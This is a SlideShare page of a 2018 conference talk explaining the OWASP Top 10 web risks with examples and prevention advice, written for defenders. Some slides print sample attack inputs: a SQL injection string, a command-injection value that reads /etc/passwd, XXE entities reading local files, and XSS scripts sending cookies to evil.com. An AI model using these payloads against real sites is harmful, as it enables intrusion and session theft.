SlideShare a Scribd company logo

OWASP Top 10 - The Ten Most Critical Web Application Security Risks

All Things Open
All Things Open

The document discusses the OWASP Top 10 list, which is periodically updated by the Open Web Application Security Project to compile the top 10 most common security vulnerabilities found in web applications. It provides details on the top vulnerabilities, including Injection, Broken Authentication, Sensitive Data Exposure, XML External Entities, Broken Access Control, Security Misconfiguration, Cross-Site Scripting, and Insecure Deserialization. For each vulnerability, it describes examples, grading based on exploitability, prevalence and detectability, and recommendations for prevention.

Technology
1 of 62
Download to read offline
All Things Open 2018 Michael Peters Technical Lead in Cloud Ops Cisco OWASP Top 10
• Open Web Application Security Project • Started in 2001, Foundation started in 2004. • "Produces freely-available articles, methodologies, documentation, tools, and technologies in the field of web application security" • Mainly known for it's "Top 10" list which is periodically updated OWASP What is it? 2
• Compile list of top 10 security vulnerabilities found most commonly in the wild. • Using industry and community feedback • Periodically updated to reflect progress or new attacks or to simplify/merge items. • "Fixed" things fall off • New hotness gets added OWASP TOP 10 What is it? 3
Grades each vulnerability by Exploitability, Prevalence, Detectability and Technical Impact on a 1-3 scale (3 being worse). OWASP TOP 10 What is it? 4
• Last updated in 2017. Previous version was in 2013 • 3 new categories: XXE, Insecure Deserialization, Insufficient Logging and Monitoring • 1 merged category: Broken Access Controls (merged Insecure Direct Object References and Missing Function Level Access Control) • Removed 2 categories: CSRF and Unvalidated Redirects and Forwards OWASP TOP 10 Changes? 5
• User-supplied data is used incorrectly in dynamic queries, commands or procedures • More common forms: SQL, No-SQL, OS Command, ORM, LDAP. • All forms of input are evil: HTTP body, HTTP Headers, Cookies, JSON, XML, URL • These "tainted" strings could be used to craft SQL queries, or OS commands. It's non-trivial to get the quoting/escaping right. #1 - INJECTION Exploitability: 3, Prevalence: 2, Detectability: 3 6
String query = "SELECT * FROM accounts WHERE custID='" + req.get("id") + "'" #1 - INJECTION Example #1 - SQL Injection 7
String query = "SELECT * FROM accounts WHERE custID='" + req.get("id") + "'" http://site.com/account-view? id=%27%20or%20%271%27%3D%271 #1 - INJECTION 8 Example #1 - SQL Injection
String query = "SELECT * FROM accounts WHERE custID='" + req.get("id") + "'" http://site.com/account-view?id=' or '1'='1 #1 - INJECTION 9 Example #1 - SQL Injection
String cmd = "pdf2html /path/to/docs/" + req.get('doc') + "' > file.html"; #1 - INJECTION 10 Example #2 - OS Command Injection
String cmd = "pdf2html /path/to/docs/" + req.get('doc') + "' > file.html"; http://site.com/doc-view?doc=|| cat /etc/passwd #1 - INJECTION 11 Example #2 - OS Command Injection
• User-supplied data absolutely should not be trusted. Validate server-side. • For SQL use parameterized queries. ORMs should help • Use a whitelist whenever possible. • DSLs and Shells are complicated beasts and trying to guess at all the ways they can be abused is difficult • If you can't whitelist, be very thorough in escaping and quoting in the context the data is used • "Validate on input; Escape on output" #1 - INJECTION 12 Prevention
13 My friend asked me if I wanted a frozen banana, but I said "No... but I want a regular banana later, so yeah." - Mitch Hedberg 😜
• You might be broken if your app: • Allows brute force attacks (no rate limiting) • Permits weak or default credentials • Uses weak credential recovery (eg, "knowledge-based answers") • Uses plain text, encrypted or weakly hashed passwords • Exposes session-ids in URLs • Doesn't invalidate sessions (logout or timeout) #2 - BROKEN AUTHENTICATION Exploitability: 3, Prevalence: 2, Detectability: 2 14
• NIST 800-63 actually recommends against using passwords as a sole factor. • Use it as part of multi-factor auth • Or replace with something like OAuth • If you must use passwords: • Enforce strong passwords • Store them securely • strong hash function (Argon2 , PBKDF2 , scrypt or bcrypt) or HMAC • unique salt • protected = salt + hash(salt, credential) #2 - BROKEN AUTHENTICATION 15 Prevention
• Rate Limit your login. • Limit from a single source (IP) • Limit for a user • Log all failures • Protect your Forgot PW functionality • Use multiple pieces of hard data • Use generic error messages • Send token over a side-channel (email, text) • Log all attempts to reset and all successes. #2 - BROKEN AUTHENTICATION 16 Prevention
17 I find that a duck's opinion of me is very much influenced over whether or not I have bread. - Mitch Hedberg 😜
• What are the data protection needs or your data? • PII, PCI, GDPR, etc • At-Rest vs In-Transit • Clear-Text vs Encrypted • Same rules apply to backups • Any old/weak crypto used? • Any certificates not verified? #3 - SENSITIVE DATA EXPOSURE Exploitability: 2, Prevalence: 3, Detectability: 2 18
• An application encrypts credit card numbers in a database using the database's encryption. However, this data is automatically decrypted when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. #3 - SENSITIVE DATA EXPOSURE Examples 19
• A social media site allows advertisers using their API to select which additional fields they want returned. The list of fields wasn't protected but allowed advertisers to select things that were considered private for the users and their friends... 
 
 (and then doesn't tell anyone about it until they shut the service down several months later) #3 - SENSITIVE DATA EXPOSURE Examples 20
• Classify all data processed, stored or transmitted • Take into account privacy laws, regulatory requirements and business needs • Don't store sensitive data unnecessarily. Discard it as soon as possible. Data that is not retained can't be leaked • Encrypt all sensitive data at-rest and in-transit • Disable caching for responses that might contain sensitive data #3 - SENSITIVE DATA EXPOSURE 21 Prevention
22 I had a paper route when I was a kid. I was a paperboy. I was supposed to go to 2,000 houses... or two dumpsters. - Mitch Hedberg 😜
• Are you doing any processing of user-supplied XML (REST, SOAP, SAML, etc) with DTDs or External Entities enabled? • DTDs/EEs are external URIs that are dereferenced and evaluated during XML processing. • Can be used to extract data, execute a remote request, perform DoS attacks, scan internal systems and more. #4 - XML EXTERNAL ENTITIES (XXE) Exploitability: 2, Prevalence: 2, Detectability: 3 23
<?xml version="1.0" encoding="ISO-885901"?> <!DOCTYPE foo [ <!ELEMENT foo any > <!ENTITY xxe SYSTEM "file:///etc/password" >]> <foo>&xxe</foo> 24 Examples #4 - XML EXTERNAL ENTITIES (XXE)
<?xml version="1.0" encoding="ISO-885901"?> <!DOCTYPE foo [ <!ELEMENT foo any > <!ENTITY xxe SYSTEM "https://127.0.0.1/ private" >]> <foo>&xxe</foo> 25 Examples #4 - XML EXTERNAL ENTITIES (XXE)
<?xml version="1.0" encoding="ISO-885901"?> <!DOCTYPE foo [ <!ELEMENT foo any > <!ENTITY xxe SYSTEM "file:///dev/random" >]> <foo>&xxe</foo> 26 Examples #4 - XML EXTERNAL ENTITIES (XXE)
• Use less complex data formats such as JSON • Patch or upgrade all XML processors and libraries • SOAP 1.2+ • Disable XML external entity and DTD processing in your parser • Validate XML or XSL with XSD #4 - XML EXTERNAL ENTITIES (XXE) 27 Prevention
28 I don't have a girlfriend. I just know a girl who would get really mad if she heard me say that. - Mitch Hedberg 😜
• Bypassing access controls by modifying the URL or request parameters • Elevation of privilege (acting as an admin when logged in as a normal user) • Metadata manipulation - replaying access tokens, cookies, or changing hidden field values • CORS misconfiguration • Forgetting to configure access controls for other HTTP methods (POST, PUT, DELETE, etc). #5 - BROKEN ACCESS CONTROL Exploitability: 2, Prevalence: 2, Detectability: 2 29
http://site.com/your-account?user_id=12839 30 Examples #5 - BROKEN ACCESS CONTROL http://site.com/your-account-admin?user_id=1283
• Access should be controlled server-side (do I really have to say that?) • Whitelist public resources. Deny everything else by default • Minimize CORS usage • Access Controls should enforce record ownership • Enforce data access at the Model layer #5 - BROKEN ACCESS CONTROL 31 Prevention
• Disable web server directory listing; remove meta-data files (like .git) • Log access control failures, alert where appropriate • Access tokens should be invalidated after logout • Rate limiting can minimize potential harm #5 - BROKEN ACCESS CONTROL 32 Prevention
33 One time a guy handed me a picture, he said "Here's a picture of me when I was younger." Every picture of you is when you were younger. - Mitch Hedberg 😜
• Missing security hardening across any part of the application stack • Unnecessary features are enabled or installed • ports, services, accounts, etc • Error handling reveals stack traces • Latest security features are disabled • Settings in the application's servers, frameworks, libraries, etc are not set to secure values • Software is out of date or has known vulnerabilities #6 - SECURITY MISCONFIGURATION Exploitability: 3, Prevalence: 3, Detectability: 3 34
• Directory listing is not disabled on the server. An attacker discovers they can simply list directories. The attacker finds your code (or if compiled, downloads and decompiles to get code), reverse engineers it and analyzes it. The attacker then finds a serious access control flaw in the application #6 - SECURITY MISCONFIGURATION Examples 35
• You have left your S3 buckets to be publicly accessible because your application needs to read and write from it. Now your backups and logs are accessible to the world. #6 - SECURITY MISCONFIGURATION Examples 36
• A development tool is accidentally included in a production deployment. This tools is discovered by attackers who can use it to gain additional access, change stored data or gather other useful details about how the system is implemented. #6 - SECURITY MISCONFIGURATION Examples 37
• A repeatable hardening process that makes it fast and easy to deploy a new environment, or lock down an existing one. - DevSecOps & Configuration Management • Minimal platform without any unnecessary features • Review all configuration options to just about every piece (application server, frameworks, cloud storage, etc) • Automated security scans #6 - SECURITY MISCONFIGURATION 38 Prevention
39  I like refried beans. That's why I want to try fried beans. Because maybe they're just as good and we are wasting time. - Mitch Hedberg 😜
• Exploits a browser's trust of the content received from the server. • Attackers inject client-side scripts into your application • Can bypass access controls and CORS restrictions • SAMY (MySpace Worm) - within 20 hours over 1 million users were affected. • 3 main types: Reflected, Stored, and DOM #7 - CROSS-SITE SCRIPTING (XSS) Exploitability: 3, Prevalence: 3, Detectability: 3 40
• Site uses external input (usually URL) as part of the displayed HTML without escaping it • Misuse of tainted data is server-side • Allows attacker to execute arbitrary HTML and Javascript in the victim's browser as the victim. • Hard for the victim to detect because they are clicking on a link to a trusted domain. #7 - CROSS-SITE SCRIPTING (XSS) Reflected XSS 41
#7 - CROSS-SITE SCRIPTING (XSS) Example: Reflected XSS 42 page += "Hi <em>" + req.get('username') + "</em>!"; http://site.com/dashboard?username=George <script>document.location='http://evil.com/ steal-cookies?cookie=' + document.cookie</ script>
#7 - CROSS-SITE SCRIPTING (XSS) Stored XSS 43 • The application stores user input and then shows that input back - unencoded - at a later time to a different user or admin. • Stored XSS is considered the most critical because it can't be prevented by the victim and the tainted data lives for a long time.
#7 - CROSS-SITE SCRIPTING (XSS) Example: Stored XSS 44 An application stores a user's name. There is also an admin function of the app to show a list of users. The admin screen does not HTML encode the user's name on output. A malicious user submits a name like this: George <script>document.location='http:// evil.com/steal-cookies?cookie=' + document.cookie</script>
#7 - CROSS-SITE SCRIPTING (XSS) DOM XSS 45 • Attacker-supplied data is sent to JavaScript frameworks, single-page applications and APIs. • Typical DOM XSS attacks can do DOM node replacement or defacement (trojan login panels), malicious software downloads, key logging, etc. • Misuse of tainted data is client-side
#7 - CROSS-SITE SCRIPTING (XSS) Example: DOM XSS 46 <select name="language"><script> document.write("<option value=default>" + document.location.href.indexOf("lang=") + "</ option>"); ... </script></select> http://site.com/home?lang=French <a href="http://evil.com/steal-cookies?cookie=' + document.cookie + '"></a>'
• Validate Input and Encode Output based on the context it's used • HTML body, attribute • JavaScript • CSS • URL • In addition, enable a Content Security Policy (CSP) to control where external scripts can be loaded from. #7 - CROSS-SITE SCRIPTING (XSS) 47 Prevention
48 I bought myself a parrot, the parrot talked, but it did not say "I'm hungry"... so it died. - Mitch Hedberg 😜
• Object and data structure related attacks if the application data deserialization can change behavior during or after deserialization. Eg, can it create classes or objects on the fly? • Existing data structures or classes can be over- written • Can exist in lots of layers: RPC, IPC, message brokers, caching/persistence, Databases (ORM), file servers, etc • Pretty difficult to exploit because it involves detailed knowledge of app and architecture #8 - INSECURE DESERIALIZATION Exploitability: 1, Prevalence: 2, Detectability: 2 49
• A React application calls a set of Spring Boot microservices. Being functional programmers, they tried to ensure that their code is immutable. The solution they came up with is serializing user state and passing it back and forth with each request. An attacker uses the Java Serial Killer tool to gain remote code execution on the application server. #8 - INSECURE DESERIALIZATION Examples 50
• Use serialization that only supports primitive data types (like JSON). • If you must use serialized objects, make sure they can't come from user input. • Isolate deserialization code to run in low privilege environments where possible • Log deserialization failures #8 - INSECURE DESERIALIZATION 51 Prevention
52 I think Big Foot is blurry, that's the problem. - Mitch Hedberg 😜
• You are vulnerable if: • You don't know the versions of all components (and their dependencies) you use • You don't subscribe to security bulletins for your components • Software is unsupported or out of date • You do not scan for vulnerabilities regularly • You don't upgrade underlying components in a timely, consistent and automated fashion. #9 - KNOWN VULNERABILITIES Exploitability: 2, Prevalence: 3, Detectability: 2 53
• Remove any components and packages you aren't actively using • Continuous inventory of version of both client and server side components • Subscribe to security bulletin alerts • Automated software composition analysis tools • Only obtain components from official sources over secure links • Ongoing plan for updating, monitoring, triaging, configuring, etc for the lifetime of the application. #9 - KNOWN VULNERABILITIES 54 Prevention
• Equifax was using a vulnerable version of Apache Struts. The vulnerability was disclosed and fixed in March, by September they hadn't updated all of their systems. Some were updated by hand, but others were missed since the process wasn't automated nor routine. 143 million people had their information stolen. #9 - KNOWN VULNERABILITIES Example 55
56 Wearing a turtleneck is like being strangled by a really weak guy... all day. - Mitch Hedberg 😜
• Important audit-able events are not logged • logins, failed logins, password changes, etc • Warnings and errors generate no, inadequate or unclear log messages • Logs are not monitored for suspicious activities • Appropriate alerting thresholds are not in place • Penetration testing and scans do not trigger alerts #10 - INSUFFICIENT LOGGING Exploitability: 2, Prevalence: 3, Detectability: 1 57
• An attacker uses a security scanner (like the OWASP ZAP Proxy) to look for XSS vulnerabilities in your application. It makes lots of repeated requests that result in lots of 500 HTTP errors in a short period of time. But because there is no monitoring in place, those errors are ignored and no real users are complaining. An attack vector is discovered and a Stored XSS attack is created. #10 - INSUFFICIENT LOGGING Examples 58
• Ensure all important events are logged. Especially access control successes and failures. • Ensure logs are generated in a format that is easily consumed • Centralized log management with tampering control • Effective monitoring and alerting to catch suspicious activity. • Establish an incident response and recovery plan: NIST 800-61 #10 - INSUFFICIENT LOGGING 59 Prevention
60 This jacket is dry clean only... which means it's dirty. - Mitch Hedberg 😜
• https://www.owasp.org • https://www.owasp.org/images/7/72/ OWASP_Top_10-2017_%28en%29.pdf.pdf • https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet • https://www.owasp.org/index.php/Authentication_Cheat_Sheet • https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project Resources
62 I saw on HBO they were advertising this boxing match, it said "It's a fight to the finish"... that's a good place to end. - Mitch Hedberg 😜

Recommended

OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewMichael Furman
 
Secure code practices
Secure code practicesSecure code practices
Secure code practicesHina Rawal
 
OWASP Top Ten
OWASP Top TenOWASP Top Ten
OWASP Top TenChristian Heinrich
 
OWASP API Security Top 10 Examples
OWASP API Security Top 10 ExamplesOWASP API Security Top 10 Examples
OWASP API Security Top 10 Examples42Crunch
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)TzahiArabov
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top TenSecurity Innovation
 
Understanding Application Threat Modelling & Architecture
Understanding Application Threat Modelling & Architecture Understanding Application Threat Modelling & Architecture
Understanding Application Threat Modelling & ArchitecturePriyanka Aash
 
Application Security
Application SecurityApplication Security
Application SecurityReggie Niccolo Santos
 

Recommended

OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewMichael Furman
 
Secure code practices
Secure code practicesSecure code practices
Secure code practicesHina Rawal
 
OWASP Top Ten
OWASP Top TenOWASP Top Ten
OWASP Top TenChristian Heinrich
 
OWASP API Security Top 10 Examples
OWASP API Security Top 10 ExamplesOWASP API Security Top 10 Examples
OWASP API Security Top 10 Examples42Crunch
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)TzahiArabov
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top TenSecurity Innovation
 
Understanding Application Threat Modelling & Architecture
Understanding Application Threat Modelling & Architecture Understanding Application Threat Modelling & Architecture
Understanding Application Threat Modelling & ArchitecturePriyanka Aash
 
Application Security
Application SecurityApplication Security
Application SecurityReggie Niccolo Santos
 
OWASP Top 10 API Security Risks
OWASP Top 10 API Security RisksOWASP Top 10 API Security Risks
OWASP Top 10 API Security RisksIndusfacePvtLtd
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesSoftware Guru
 
Security Testing for Test Professionals
Security Testing for Test ProfessionalsSecurity Testing for Test Professionals
Security Testing for Test ProfessionalsTechWell
 
OWASP TOP 10 VULNERABILITIS
OWASP TOP 10 VULNERABILITISOWASP TOP 10 VULNERABILITIS
OWASP TOP 10 VULNERABILITISNull Bhubaneswar
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
Mobile Application Penetration Testing
Mobile Application Penetration TestingMobile Application Penetration Testing
Mobile Application Penetration TestingBGA Cyber Security
 
OWASP Top Ten in Practice
OWASP Top Ten in PracticeOWASP Top Ten in Practice
OWASP Top Ten in PracticeSecurity Innovation
 
Introduction To OWASP
Introduction To OWASPIntroduction To OWASP
Introduction To OWASPMarco Morana
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOWASP Delhi
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practicesScott Hurrey
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practicesMohammed Danish Amber
 
Web application security
Web application securityWeb application security
Web application securityKapil Sharma
 
Sql injection
Sql injectionSql injection
Sql injectionNuruzzaman Milon
 
OWASP Secure Coding
OWASP Secure CodingOWASP Secure Coding
OWASP Secure Codingbilcorry
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
A5: Security Misconfiguration
A5: Security Misconfiguration A5: Security Misconfiguration
A5: Security Misconfiguration Tariq Islam
 
API Security Fundamentals
API Security FundamentalsAPI Security Fundamentals
API Security FundamentalsJosé Haro Peralta
 
OWASP TOP 10
OWASP TOP 10OWASP TOP 10
OWASP TOP 10Robert MacLean
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombPriyanka Aash
 

More Related Content

What's hot

OWASP Top 10 API Security Risks
OWASP Top 10 API Security RisksOWASP Top 10 API Security Risks
OWASP Top 10 API Security RisksIndusfacePvtLtd
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesSoftware Guru
 
Security Testing for Test Professionals
Security Testing for Test ProfessionalsSecurity Testing for Test Professionals
Security Testing for Test ProfessionalsTechWell
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
Mobile Application Penetration Testing
Mobile Application Penetration TestingMobile Application Penetration Testing
Mobile Application Penetration TestingBGA Cyber Security
 
Introduction To OWASP
Introduction To OWASPIntroduction To OWASP
Introduction To OWASPMarco Morana
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOWASP Delhi
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practicesScott Hurrey
 
Web application security
Web application securityWeb application security
Web application securityKapil Sharma
 
OWASP Secure Coding
OWASP Secure CodingOWASP Secure Coding
OWASP Secure Codingbilcorry
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
A5: Security Misconfiguration
A5: Security Misconfiguration A5: Security Misconfiguration
A5: Security Misconfiguration Tariq Islam
 

What's hot (20)

OWASP Top 10 API Security Risks
OWASP Top 10 API Security RisksOWASP Top 10 API Security Risks
OWASP Top 10 API Security Risks
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
 
Security Testing for Test Professionals
Security Testing for Test ProfessionalsSecurity Testing for Test Professionals
Security Testing for Test Professionals
 
OWASP TOP 10 VULNERABILITIS
OWASP TOP 10 VULNERABILITISOWASP TOP 10 VULNERABILITIS
OWASP TOP 10 VULNERABILITIS
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
 
Mobile Application Penetration Testing
Mobile Application Penetration TestingMobile Application Penetration Testing
Mobile Application Penetration Testing
 
OWASP Top Ten in Practice
OWASP Top Ten in PracticeOWASP Top Ten in Practice
OWASP Top Ten in Practice
 
Introduction To OWASP
Introduction To OWASPIntroduction To OWASP
Introduction To OWASP
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilities
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practices
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practices
 
Web application security
Web application securityWeb application security
Web application security
 
Sql injection
Sql injectionSql injection
Sql injection
 
OWASP Secure Coding
OWASP Secure CodingOWASP Secure Coding
OWASP Secure Coding
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
 
A5: Security Misconfiguration
A5: Security Misconfiguration A5: Security Misconfiguration
A5: Security Misconfiguration
 
API Security Fundamentals
API Security FundamentalsAPI Security Fundamentals
API Security Fundamentals
 

Similar to OWASP Top 10 - The Ten Most Critical Web Application Security Risks

RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombPriyanka Aash
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelinesZakaria SMAHI
 
How to Destroy a Database
How to Destroy a DatabaseHow to Destroy a Database
How to Destroy a DatabaseJohn Ashmead
 
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...IBM Security
 
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...PaloAltoNetworks
 
All These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDFAll These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDFMichael Gough
 
Breaking Secure Mobile Applications - Hack In The Box 2014 KL
Breaking Secure Mobile Applications - Hack In The Box 2014 KLBreaking Secure Mobile Applications - Hack In The Box 2014 KL
Breaking Secure Mobile Applications - Hack In The Box 2014 KLiphonepentest
 
Security Threats and Vulnerabilities-2.pptx
Security Threats and Vulnerabilities-2.pptxSecurity Threats and Vulnerabilities-2.pptx
Security Threats and Vulnerabilities-2.pptxAmardeepKumar621436
 
DBMS Vulnerabilities And Threats.pptx
DBMS Vulnerabilities And Threats.pptxDBMS Vulnerabilities And Threats.pptx
DBMS Vulnerabilities And Threats.pptxsiti829412
 
SplunkLive! Stockholm 2015 breakout - Analytics based security
SplunkLive! Stockholm 2015 breakout - Analytics based securitySplunkLive! Stockholm 2015 breakout - Analytics based security
SplunkLive! Stockholm 2015 breakout - Analytics based securitySplunk
 
Introduction to Mobile Application Security - Techcity 2015 (Vilnius)
Introduction to Mobile Application Security - Techcity 2015 (Vilnius)Introduction to Mobile Application Security - Techcity 2015 (Vilnius)
Introduction to Mobile Application Security - Techcity 2015 (Vilnius)Luca Bongiorni
 
Implementing security for your library | PLAN Tech Day Conference
Implementing security for your library | PLAN Tech Day ConferenceImplementing security for your library | PLAN Tech Day Conference
Implementing security for your library | PLAN Tech Day ConferenceBrian Pichman
 
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADFOWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADFBrian Huff
 
For Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSecFor Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSecLalit Kale
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSolvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSebastien Deleersnyder
 

Similar to OWASP Top 10 - The Ten Most Critical Web Application Security Risks (20)

OWASP TOP 10
OWASP TOP 10OWASP TOP 10
OWASP TOP 10
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
 
How to Destroy a Database
How to Destroy a DatabaseHow to Destroy a Database
How to Destroy a Database
 
Webdays blida mobile top 10 risks
Webdays blida mobile top 10 risksWebdays blida mobile top 10 risks
Webdays blida mobile top 10 risks
 
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
 
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...
 
Owasp Top 10
Owasp Top 10Owasp Top 10
Owasp Top 10
 
ISSA Siem Fraud
ISSA Siem FraudISSA Siem Fraud
ISSA Siem Fraud
 
All These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDFAll These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDF
 
Breaking Secure Mobile Applications - Hack In The Box 2014 KL
Breaking Secure Mobile Applications - Hack In The Box 2014 KLBreaking Secure Mobile Applications - Hack In The Box 2014 KL
Breaking Secure Mobile Applications - Hack In The Box 2014 KL
 
Security Threats and Vulnerabilities-2.pptx
